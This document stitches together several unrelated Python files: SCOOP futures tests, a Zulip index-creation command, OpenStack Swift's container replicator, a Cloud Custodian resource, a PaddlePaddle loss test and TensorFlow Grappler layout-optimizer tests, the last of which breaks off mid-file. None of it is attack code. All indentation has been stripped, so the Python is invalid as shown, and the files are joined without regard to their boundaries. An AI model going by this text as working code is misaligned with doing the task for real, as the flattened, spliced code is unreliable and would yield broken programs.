self.assertTrue(futures._startup(funcCancel))
def test_callback(self):
self.assertTrue(futures._startup(funcCallback))
def test_wait_no_timeout(self):
done, not_done = futures._startup(funcWait, -1)
self.assertTrue(len(done) == 1000)
self.assertTrue(len(not_done) == 0)
def test_wait_with_timeout(self):
done, not_done = futures._startup(funcWait, 0.1)
self.assertTrue((len(done) + len(not_done)) == 1000)
def test_wait_nonblocking(self):
done, not_done = futures._startup(funcWait, 0)
self.assertTrue((len(done) + len(not_done)) == 1000)
def test_map_as_completed_single(self):
result = futures._startup(funcMapAsCompleted, 30)
self.assertEqual(result, 9455)
def test_map_as_completed_multi(self):
self.w = self.multiworker_set()
result = futures._startup(funcMapAsCompleted, 30)
self.assertEqual(result, 9455)
def test_from_generator_single(self):
result = futures._startup(funcIter, 30)
self.assertEqual(result, 9455)
def test_from_generator_multi(self):
self.w = self.multiworker_set()
result = futures._startup(funcIter, 30)
self.assertEqual(result, 9455)
class TestCoherent(TestScoopCommon):
def __init(self, *args, **kwargs):
super(TestCoherent, self).__init(*args, **kwargs)
def test_mapReduce(self):
result = futures._startup(funcMapReduce, [10, 20, 30])
self.assertEqual(result, 1400)
def test_doubleMapReduce(self):
result = futures._startup(funcDoubleMapReduce, [10, 20, 30])
self.assertTrue(result)
def test_mapScan(self):
result = futures._startup(funcMapScan, [10, 20, 30])
self.assertEqual(max(result), 1400)
class TestShared(TestScoopCommon):
def __init(self, *args, **kwargs):
super(TestShared, self).__init(*args, **kwargs)
def test_shareConstant(self):
result = futures._startup(funcSharedFunction)
self.assertEqual(result, True)
def test_shareFunction(self):
result = futures._startup(funcSharedConstant)
self.assertEqual(result, True)
if __name__ == '__main__' and os.environ.get('IS_ORIGIN', "1") == "1":
utSimple = unittest.TestLoader().loadTestsFromTestCase(TestSingleFunction)
utComplex = unittest.TestLoader().loadTestsFromTestCase(TestMultiFunction)
utApi = unittest.TestLoader().loadTestsFromTestCase(TestApi)
utUtils = unittest.TestLoader().loadTestsFromTestCase(TestUtils)
utCoherent = unittest.TestLoader().loadTestsFromTestCase(TestCoherent)
utShared = unittest.TestLoader().loadTestsFromTestCase(TestShared)
utStat = unittest.TestLoader().loadTestsFromTestCase(TestStat)
utStopWatch = unittest.TestLoader().loadTestsFromTestCase(TestStopWatch)
if len(sys.argv) > 1:
if sys.argv[1] == "simple":
unittest.TextTestRunner(verbosity=2).run(utSimple)
elif sys.argv[1] == "complex":
unittest.TextTestRunner(verbosity=2).run(utComplex)
elif sys.argv[1] == "api":
unittest.TextTestRunner(verbosity=2).run(utApi)
elif sys.argv[1] == "utils":
unittest.TextTestRunner(verbosity=2).run(utUtils)
elif sys.argv[1] == "coherent":
unittest.TextTestRunner(verbosity=2).run(utCoherent)
elif sys.argv[1] == "shared":
unittest.TextTestRunner(verbosity=2).run(utShared)
elif sys.argv[1] == "stat":
unittest.TextTestRunner(verbosity=2).run(utStat)
elif sys.argv[1] == "stopwatch":
unittest.TextTestRunner(verbosity=2).run(utStopWatch)
elif sys.argv[1] == "verbose":
sys.argv = sys.argv[0:1]
unittest.main(verbosity=2)
else:
unittest.main()
elif __name__ == '__main__':
futures._startup(mainSimple)
|
from typing import Any
from django.db import connection
from zerver.lib.management import ZulipBaseCommand
def create_indexes() -> None:
# Creating concurrent indexes is kind of a pain with current versions
# of Django/postgres, because you will get this error with seemingly
# reasonable code:
#
# CREATE INDEX CONCURRENTLY cannot be executed from a function or multi-command string
#
# For a lot more detail on this process, refer to the commit message
# that added this file to the repo.
with connection.cursor() as cursor:
# copied from 0082
print("Creating index zerver_usermessage_starred_message_id.")
cursor.execute('''
CREATE INDEX IF NOT EXISTS zerver_usermessage_starred_message_id
ON zerver_usermessage (user_profile_id, message_id)
WHERE (flags & 2) != 0;
''')
# copied from 0083
print("Creating index zerver_usermessage_mentioned_message_id.")
cursor.execute('''
CREATE INDEX IF NOT EXISTS zerver_usermessage_mentioned_message_id
ON zerver_usermessage (user_profile_id, message_id)
WHERE (flags & 8) != 0;
''')
# copied from 0095
print("Creating index zerver_usermessage_unread_message_id.")
cursor.execute('''
CREATE INDEX IF NOT EXISTS zerver_usermessage_unread_message_id
ON zerver_usermessage (user_profile_id, message_id)
WHERE (flags & 1) = 0;
''')
# copied from 0098
print("Creating index zerver_usermessage_has_alert_word_message_id.")
cursor.execute('''
CREATE INDEX IF NOT EXISTS zerver_usermessage_has_alert_word_message_id
ON zerver_usermessage (user_profile_id, message_id)
WHERE (flags & 512) != 0;
''')
# copied from 0099
print("Creating index zerver_usermessage_wildcard_mentioned_message_id.")
cursor.execute('''
CREATE INDEX IF NOT EXISTS zerver_usermessage_wildcard_mentioned_message_id
ON zerver_usermessage (user_profile_id, message_id)
WHERE (flags & 8) != 0 OR (flags & 16) != 0;
''')
# copied from 0177
print("Creating index zerver_usermessage_is_private_message_id.")
cursor.execute('''
CREATE INDEX IF NOT EXISTS zerver_usermessage_is_private_message_id
ON zerver_usermessage (user_profile_id, message_id)
WHERE (flags & 2048) != 0;
''')
# copied from 0180
print("Creating index zerver_usermessage_active_mobile_push_notification_id.")
cursor.execute('''
CREATE INDEX IF NOT EXISTS zerver_usermessage_active_mobile_push_notification_id
ON zerver_usermessage (user_profile_id, message_id)
WHERE (flags & 4096) != 0;
''')
print("Finished.")
class Command(ZulipBaseCommand):
help = """Create concurrent indexes for large tables."""
def handle(self, *args: Any, **options: str) -> None:
create_indexes()
|
import os
import itertools
import json
import time
from collections import defaultdict
from eventlet import Timeout
from swift.container.sync_store import ContainerSyncStore
from swift.container.backend import ContainerBroker, DATADIR
from swift.container.reconciler import (
MISPLACED_OBJECTS_ACCOUNT, incorrect_policy_index,
get_reconciler_container_name, get_row_to_q_entry_translator)
from swift.common import db_replicator
from swift.common.storage_policy import POLICIES
from swift.common.exceptions import DeviceUnavailable
from swift.common.http import is_success
from swift.common.db import DatabaseAlreadyExists
from swift.common.utils import (Timestamp, hash_path,
storage_directory, majority_size)
class ContainerReplicator(db_replicator.Replicator):
server_type = 'container'
brokerclass = ContainerBroker
datadir = DATADIR
default_port = 6201
def report_up_to_date(self, full_info):
reported_key_map = {
'reported_put_timestamp': 'put_timestamp',
'reported_delete_timestamp': 'delete_timestamp',
'reported_bytes_used': 'bytes_used',
'reported_object_count': 'count',
}
for reported, value_key in reported_key_map.items():
if full_info[reported] != full_info[value_key]:
return False
return True
def _gather_sync_args(self, replication_info):
parent = super(ContainerReplicator, self)
sync_args = parent._gather_sync_args(replication_info)
if len(POLICIES) > 1:
sync_args += tuple(replication_info[k] for k in
('status_changed_at', 'count',
'storage_policy_index'))
return sync_args
def _handle_sync_response(self, node, response, info, broker, http,
different_region):
parent = super(ContainerReplicator, self)
if is_success(response.status):
remote_info = json.loads(response.data)
if incorrect_policy_index(info, remote_info):
status_changed_at = Timestamp(time.time())
broker.set_storage_policy_index(
remote_info['storage_policy_index'],
timestamp=status_changed_at.internal)
sync_timestamps = ('created_at', 'put_timestamp',
'delete_timestamp')
if any(info[key] != remote_info[key] for key in sync_timestamps):
broker.merge_timestamps(*(remote_info[key] for key in
sync_timestamps))
rv = parent._handle_sync_response(
node, response, info, broker, http, different_region)
return rv
def find_local_handoff_for_part(self, part):
"""
Look through devices in the ring for the first handoff device that was
identified during job creation as available on this node.
:returns: a node entry from the ring
"""
nodes = self.ring.get_part_nodes(part)
more_nodes = self.ring.get_more_nodes(part)
for node in itertools.chain(nodes, more_nodes):
if node['id'] in self._local_device_ids:
return node
return None
def get_reconciler_broker(self, timestamp):
"""
Get a local instance of the reconciler container broker that is
appropriate to enqueue the given timestamp.
:param timestamp: the timestamp of the row to be enqueued
:returns: a local reconciler broker
"""
container = get_reconciler_container_name(timestamp)
if self.reconciler_containers and \
container in self.reconciler_containers:
return self.reconciler_containers[container][1]
account = MISPLACED_OBJECTS_ACCOUNT
part = self.ring.get_part(account, container)
node = self.find_local_handoff_for_part(part)
if not node:
raise DeviceUnavailable(
'No mounted devices found suitable to Handoff reconciler '
'container %s in partition %s' % (container, part))
hsh = hash_path(account, container)
db_dir = storage_directory(DATADIR, part, hsh)
db_path = os.path.join(self.root, node['device'], db_dir, hsh + '.db')
broker = ContainerBroker(db_path, account=account, container=container)
if not os.path.exists(broker.db_file):
try:
broker.initialize(timestamp, 0)
except DatabaseAlreadyExists:
pass
if self.reconciler_containers is not None:
self.reconciler_containers[container] = part, broker, node['id']
return broker
def feed_reconciler(self, container, item_list):
"""
Add queue entries for rows in item_list to the local reconciler
container database.
:param container: the name of the reconciler container
:param item_list: the list of rows to enqueue
:returns: True if successfully enqueued
"""
try:
reconciler = self.get_reconciler_broker(container)
except DeviceUnavailable as e:
self.logger.warning('DeviceUnavailable: %s', e)
return False
self.logger.debug('Adding %d objects to the reconciler at %s',
len(item_list), reconciler.db_file)
try:
reconciler.merge_items(item_list)
except (Exception, Timeout):
self.logger.exception('UNHANDLED EXCEPTION: trying to merge '
'%d items to reconciler container %s',
len(item_list), reconciler.db_file)
return False
return True
def dump_to_reconciler(self, broker, point):
"""
Look for object rows for objects updates in the wrong storage policy
in broker with a ``ROWID`` greater than the rowid given as point.
:param broker: the container broker with misplaced objects
:param point: the last verified ``reconciler_sync_point``
:returns: the last successful enqueued rowid
"""
max_sync = broker.get_max_row()
misplaced = broker.get_misplaced_since(point, self.per_diff)
if not misplaced:
return max_sync
translator = get_row_to_q_entry_translator(broker)
errors = False
low_sync = point
while misplaced:
batches = defaultdict(list)
for item in misplaced:
container = get_reconciler_container_name(item['created_at'])
batches[container].append(translator(item))
for container, item_list in batches.items():
success = self.feed_reconciler(container, item_list)
if not success:
errors = True
point = misplaced[-1]['ROWID']
if not errors:
low_sync = point
misplaced = broker.get_misplaced_since(point, self.per_diff)
return low_sync
def _post_replicate_hook(self, broker, info, responses):
if info['account'] == MISPLACED_OBJECTS_ACCOUNT:
return
try:
self.sync_store.update_sync_store(broker)
except Exception:
self.logger.exception('Failed to update sync_store %s' %
broker.db_file)
point = broker.get_reconciler_sync()
if not broker.has_multiple_policies() and info['max_row'] != point:
broker.update_reconciler_sync(info['max_row'])
return
max_sync = self.dump_to_reconciler(broker, point)
success = responses.count(True) >= majority_size(len(responses))
if max_sync > point and success:
# to be safe, only slide up the sync point with a majority on
# replication
broker.update_reconciler_sync(max_sync)
def delete_db(self, broker):
"""
Ensure that reconciler databases are only cleaned up at the end of the
replication run.
"""
if (self.reconciler_cleanups is not None and
broker.account == MISPLACED_OBJECTS_ACCOUNT):
# this container shouldn't be here, make sure it's cleaned up
self.reconciler_cleanups[broker.container] = broker
return
try:
# DB is going to get deleted. Be preemptive about it
self.sync_store.remove_synced_container(broker)
except Exception:
self.logger.exception('Failed to remove sync_store entry %s' %
broker.db_file)
return super(ContainerReplicator, self).delete_db(broker)
def replicate_reconcilers(self):
"""
Ensure any items merged to reconciler containers during replication
are pushed out to correct nodes and any reconciler containers that do
not belong on this node are removed.
"""
self.logger.info('Replicating %d reconciler containers',
len(self.reconciler_containers))
for part, reconciler, node_id in self.reconciler_containers.values():
self.cpool.spawn_n(
self._replicate_object, part, reconciler.db_file, node_id)
self.cpool.waitall()
# wipe out the cache do disable bypass in delete_db
cleanups = self.reconciler_cleanups
self.reconciler_cleanups = self.reconciler_containers = None
self.logger.info('Cleaning up %d reconciler containers',
len(cleanups))
for reconciler in cleanups.values():
self.cpool.spawn_n(self.delete_db, reconciler)
self.cpool.waitall()
self.logger.info('Finished reconciler replication')
def run_once(self, *args, **kwargs):
self.reconciler_containers = {}
self.reconciler_cleanups = {}
self.sync_store = ContainerSyncStore(self.root,
self.logger,
self.mount_check)
rv = super(ContainerReplicator, self).run_once(*args, **kwargs)
if any([self.reconciler_containers, self.reconciler_cleanups]):
self.replicate_reconcilers()
return rv
class ContainerReplicatorRpc(db_replicator.ReplicatorRpc):
def _parse_sync_args(self, args):
parent = super(ContainerReplicatorRpc, self)
remote_info = parent._parse_sync_args(args)
if len(args) > 9:
remote_info['status_changed_at'] = args[7]
remote_info['count'] = args[8]
remote_info['storage_policy_index'] = args[9]
return remote_info
def _get_synced_replication_info(self, broker, remote_info):
"""
Sync the remote_info storage_policy_index if needed and return the
newly synced replication info.
:param broker: the database broker
:param remote_info: the remote replication info
:returns: local broker replication info
"""
info = broker.get_replication_info()
if incorrect_policy_index(info, remote_info):
status_changed_at = Timestamp(time.time()).internal
broker.set_storage_policy_index(
remote_info['storage_policy_index'],
timestamp=status_changed_at)
info = broker.get_replication_info()
return info
|
from c7n.manager import resources
from c7n.query import QueryResourceManager
@resources.register('rest-api')
class RestAPI(QueryResourceManager):
resource_type = "aws.apigateway.restapis"
|
import unittest
import numpy as np
from op_test import OpTest
def smooth_l1_loss_forward(val, sigma2):
abs_val = abs(val)
if abs_val < 1.0 / sigma2:
return 0.5 * val * val * sigma2
else:
return abs_val - 0.5 / sigma2
class TestSmoothL1LossOp1(OpTest):
def setUp(self):
self.op_type = "smooth_l1_loss"
dims = (5, 10)
self.inputs = {
'X': np.random.random(dims).astype("float32"),
'Y': np.random.random(dims).astype("float32")
}
sigma = 3.0
self.attrs = {'sigma': sigma}
sigma2 = sigma * sigma
diff = self.inputs['X'] - self.inputs['Y']
loss = np.vectorize(smooth_l1_loss_forward)(diff, sigma2).sum(1)
loss = loss.reshape((dims[0], 1))
self.outputs = {
'Diff': diff.astype('float32'),
'Out': loss.astype('float32')
}
def test_check_output(self):
self.check_output()
def test_check_grad_normal(self):
self.check_grad(['X', 'Y'], 'Out', max_relative_error=0.02)
def test_check_grad_ingore_x(self):
self.check_grad(
['Y'], 'Out', max_relative_error=0.03, no_grad_set=set("X"))
def test_check_grad_ingore_y(self):
self.check_grad(
['X'], 'Out', max_relative_error=0.03, no_grad_set=set('Y'))
class TestSmoothL1LossOp2(OpTest):
def setUp(self):
self.op_type = "smooth_l1_loss"
dims = (5, 10)
self.inputs = {
'X': np.random.random(dims).astype("float32"),
'Y': np.random.random(dims).astype("float32"),
'InsideWeight': np.random.random(dims).astype("float32"),
'OutsideWeight': np.random.random(dims).astype("float32")
}
sigma = 3.0
self.attrs = {'sigma': sigma}
sigma2 = sigma * sigma
diff = self.inputs['X'] - self.inputs['Y']
diff = diff * self.inputs['InsideWeight']
loss = np.vectorize(smooth_l1_loss_forward)(diff, sigma2)
loss = loss * self.inputs['OutsideWeight']
loss = loss.sum(1).reshape((dims[0], 1))
self.outputs = {
'Diff': diff.astype('float32'),
'Out': loss.astype('float32')
}
def test_check_output(self):
self.check_output()
def test_check_grad_normal(self):
self.check_grad(['X', 'Y'], 'Out', max_relative_error=0.03)
def test_check_grad_ingore_x(self):
self.check_grad(
['Y'],
'Out',
max_relative_error=0.03,
no_grad_set=set(['X', 'InsideWeight', 'OutsideWeight']))
def test_check_grad_ingore_y(self):
self.check_grad(
['X'],
'Out',
max_relative_error=0.03,
no_grad_set=set(['Y', 'InsideWeight', 'OutsideWeight']))
if __name__ == '__main__':
unittest.main()
|
"""Tests for Grappler LayoutOptimizer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import device_properties_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.core.protobuf import saver_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import test_util
from tensorflow.python.grappler import cluster as gcluster
from tensorflow.python.grappler import tf_optimizer
from tensorflow.python.layers import convolutional as conv_layers
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import gen_array_ops
from tensorflow.python.ops import gen_math_ops
from tensorflow.python.ops import gen_nn_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import gradient_descent
from tensorflow.python.training import saver as saver_lib
def _weight(shape):
"""Generates a weight of a given shape."""
return random_ops.truncated_normal(shape, seed=0, stddev=0.1)
def _bias(shape):
"""Generates a bias of a given shape."""
return constant_op.constant(0.1, shape=shape)
def _conv2d(x, w):
"""Returns a 2d convolution layer with full stride."""
return nn.conv2d(x, w, strides=[1, 1, 1, 1], padding='SAME')
def _max_pool_2x2(x):
"""Downsamples a feature map by 2X."""
return nn.max_pool(
x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
def _two_layer_model(x):
x_image = array_ops.reshape(x, [-1, 28, 28, 1])
w_conv1 = _weight([5, 5, 1, 32])
b_conv1 = _bias([32])
h_conv1 = nn.relu(_conv2d(x_image, w_conv1) + b_conv1)
h_pool1 = _max_pool_2x2(h_conv1)
w_conv2 = _weight([5, 5, 32, 64])
b_conv2 = _bias([64])
h_conv2 = nn.relu(_conv2d(h_pool1, w_conv2) + b_conv2)
h_pool2 = _max_pool_2x2(h_conv2)
return h_pool2
def _model_with_second_port():
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([2, 5, 5, 4], seed=0)
scale = constant_op.constant(0.1, shape=[4])
offset = constant_op.constant(0.3, shape=[4])
y, mean, _ = nn.fused_batch_norm(x, scale, offset)
mul = math_ops.add(y, mean)
output = array_ops.identity(mul)
return output
def _model_with_branch(x):
x_image = array_ops.reshape(x, [-1, 28, 28, 1])
w_conv1 = _weight([5, 5, 1, 32])
w_conv2 = _weight([5, 5, 1, 32])
c_conv1 = _conv2d(x_image, w_conv1)
c_conv2 = _conv2d(x_image, w_conv2)
add = math_ops.add(c_conv1, c_conv2)
return add
def _model_with_vec_and_4d(x):
x_image = array_ops.reshape(x, [-1, 28, 28, 1])
w_conv1 = _weight([5, 5, 1, 32])
c_conv1 = _conv2d(x_image, w_conv1)
vector = constant_op.constant(6.4, shape=[32])
add = math_ops.add(c_conv1, vector)
return add
def _loop():
random_seed.set_random_seed(0)
x1 = random_ops.truncated_normal([1, 784], seed=0)
x2 = random_ops.truncated_normal([1, 784], seed=0)
x3 = random_ops.truncated_normal([1, 784], seed=0)
x4 = random_ops.truncated_normal([1, 784], seed=0)
elems = (x1, x2, x3, x4)
outputs = functional_ops.map_fn(_two_layer_model, elems, dtype=dtypes.float32)
return outputs
def _loop_with_branch():
random_seed.set_random_seed(0)
x1 = random_ops.truncated_normal([1, 784], seed=0)
x2 = random_ops.truncated_normal([1, 784], seed=0)
x3 = random_ops.truncated_normal([1, 784], seed=0)
x4 = random_ops.truncated_normal([1, 784], seed=0)
elems = (x1, x2, x3, x4)
outputs = functional_ops.map_fn(
_model_with_branch, elems, dtype=dtypes.float32)
return outputs
def _loop_with_vec_and_4d():
random_seed.set_random_seed(0)
x1 = random_ops.truncated_normal([1, 784], seed=0)
x2 = random_ops.truncated_normal([1, 784], seed=0)
x3 = random_ops.truncated_normal([1, 784], seed=0)
x4 = random_ops.truncated_normal([1, 784], seed=0)
elems = (x1, x2, x3, x4)
outputs = functional_ops.map_fn(
_model_with_vec_and_4d, elems, dtype=dtypes.float32)
return outputs
def _get_config(layout_optimizer=True):
if layout_optimizer:
rewrite_options = rewriter_config_pb2.RewriterConfig(
layout_optimizer=rewriter_config_pb2.RewriterConfig.ON,
# do not remove duplicated nodes
arithmetic_optimization=rewriter_config_pb2.RewriterConfig.OFF)
else:
rewrite_options = rewriter_config_pb2.RewriterConfig(
layout_optimizer=rewriter_config_pb2.RewriterConfig.OFF,
# do not remove duplicated nodes
arithmetic_optimization=rewriter_config_pb2.RewriterConfig.OFF)
rewrite_options.min_graph_nodes = -1
graph_options = config_pb2.GraphOptions(
rewrite_options=rewrite_options, build_cost_model=1)
config = config_pb2.ConfigProto(graph_options=graph_options)
config.graph_options.optimizer_options.opt_level = -1
return config
def _simple_metagraph(depthwise=False):
random_seed.set_random_seed(0)
x = variables.Variable(random_ops.truncated_normal([1, 200, 200, 3], seed=0))
conv = conv_layers.separable_conv2d if depthwise else conv_layers.conv2d
y = conv(x, 32, [3, 3])
z = conv(y, 32, [3, 3])
optimizer = gradient_descent.GradientDescentOptimizer(1e-4)
loss = math_ops.reduce_mean(z)
train_op = optimizer.minimize(loss)
graph = ops.get_default_graph()
graph.add_to_collection('train_op', train_op)
meta_graph = saver_lib.export_meta_graph(graph_def=graph.as_graph_def())
return meta_graph
def _get_cluster():
named_device = device_properties_pb2.NamedDevice()
named_device.name = '/GPU:0'
named_device.properties.type = 'GPU'
named_device.properties.num_cores = 24
named_device.properties.frequency = 1000
named_device.properties.environment['architecture'] = '4'
cluster = gcluster.Cluster(devices=[named_device])
return cluster
def _is_transpose(node):
return node.endswith('TransposeNHWCToNCHW-LayoutOptimizer') or node.endswith(
'TransposeNCHWToNHWC-LayoutOptimizer')
def _is_permute(node):
return node.endswith('VecPermuteNHWCToNCHW-LayoutOptimizer') or node.endswith(
'VecPermuteNCHWToNHWC-LayoutOptimizer')
class LayoutOptimizerTest(test.TestCase):
"""Tests the Grappler layout optimizer."""
def _assert_trans_nchw_to_nhwc(self, name, nodes):
self.assertIn(name + '-TransposeNCHWToNHWC-LayoutOptimizer', nodes)
def _assert_trans_nhwc_to_nchw(self, name, nodes):
self.assertIn(name + '-TransposeNHWCToNCHW-LayoutOptimizer', nodes)
def _assert_map_nhwc_to_nchw(self, name, nodes):
self.assertIn(name + '-DimMapNHWCToNCHW-LayoutOptimizer', nodes)
def _assert_vec_nchw_to_nhwc(self, name, nodes):
self.assertIn(name + '-VecPermuteNCHWToNHWC-LayoutOptimizer', nodes)
def _assert_vec_nhwc_to_nchw(self, name, nodes):
self.assertIn(name + '-VecPermuteNHWCToNCHW-LayoutOptimizer', nodes)
def _train(self, checkpoint_path, layout_optimizer=False, restore=False):
ops.reset_default_graph()
graph = ops.get_default_graph()
with session.Session(
config=_get_config(layout_optimizer), graph=graph) as sess:
batch = 2
height = 6
width = 7
input_channels = 3
shape = [batch, height, width, input_channels]
image = array_ops.placeholder(dtype='float32', shape=shape)
conv1 = conv_layers.conv2d(image, 32, [3, 3])
conv2 = conv_layers.conv2d(conv1, 32, [3, 3])
optimizer = gradient_descent.GradientDescentOptimizer(0.01)
loss = math_ops.reduce_mean(conv2)
train_op = optimizer.minimize(loss)
saver = saver_lib.Saver(write_version=saver_pb2.SaverDef.V2)
if restore:
saver.restore(sess, checkpoint_path)
else:
self.evaluate(variables.global_variables_initializer())
np.random.seed(0)
for _ in range(2):
image_val = np.random.rand(*shape).astype(np.float32)
sess.run([loss, train_op], feed_dict={image: image_val})
if restore:
all_vars = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
all_vars_values = [var.eval(session=sess) for var in all_vars]
return all_vars_values
else:
saver.save(sess, checkpoint_path)
def testTwoConvLayers(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
output = _two_layer_model(x)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('Relu_1-0-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testSplitWithNonConstAxis(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
dim = array_ops.placeholder(dtype='int32')
split = array_ops.split(conv, 2, axis=dim)
scale = constant_op.constant(0.1, shape=[32])
offset = constant_op.constant(0.3, shape=[32])
bn0 = nn.fused_batch_norm(split[0], scale, offset)
bn1 = nn.fused_batch_norm(split[1], scale, offset)
add = bn0[0] + bn1[0]
output = array_ops.identity(add)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = sess.run(output, feed_dict={dim: 3})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata, feed_dict={dim: 3})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('add_2-0-0', nodes)
self._assert_map_nhwc_to_nchw('split-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testSplitVWithNonConstAxis(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
dim = array_ops.placeholder(dtype='int32')
sizes = constant_op.constant([50, 10, 4], shape=[3])
split = gen_array_ops.split_v(
value=conv, size_splits=sizes, axis=dim, num_split=3)
output = math_ops.reduce_sum(split[0])
with session.Session(config=_get_config(False)) as sess:
output_val_ref = sess.run(output, feed_dict={dim: 3})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata, feed_dict={dim: 3})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('SplitV-0-0', nodes)
self._assert_map_nhwc_to_nchw('SplitV-2', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testPadWithConstPaddings(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
paddings_val = [[1, 2], [3, 4], [5, 6], [7, 8]]
paddings = constant_op.constant(
paddings_val, dtype='int32', name='PaddingsConst')
pad = array_ops.pad(conv, paddings)
output = array_ops.identity(pad)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('Pad-0-0', nodes)
self.assertIn('Pad-1-LayoutOptimizer', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testReduceSum(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
reduce_sum = math_ops.reduce_sum(conv)
output = array_ops.identity(reduce_sum)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Three transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 1
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testCast(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
cast = math_ops.cast(conv, dtype='bool')
output = array_ops.identity(cast)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('Cast-0-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testSqueeze(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
reduce_sum = math_ops.reduce_sum(conv, axis=[1, 2])
squeeze = array_ops.squeeze(reduce_sum)
output = array_ops.identity(squeeze)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Three transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 1
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testSqueezeAlongHW(self):
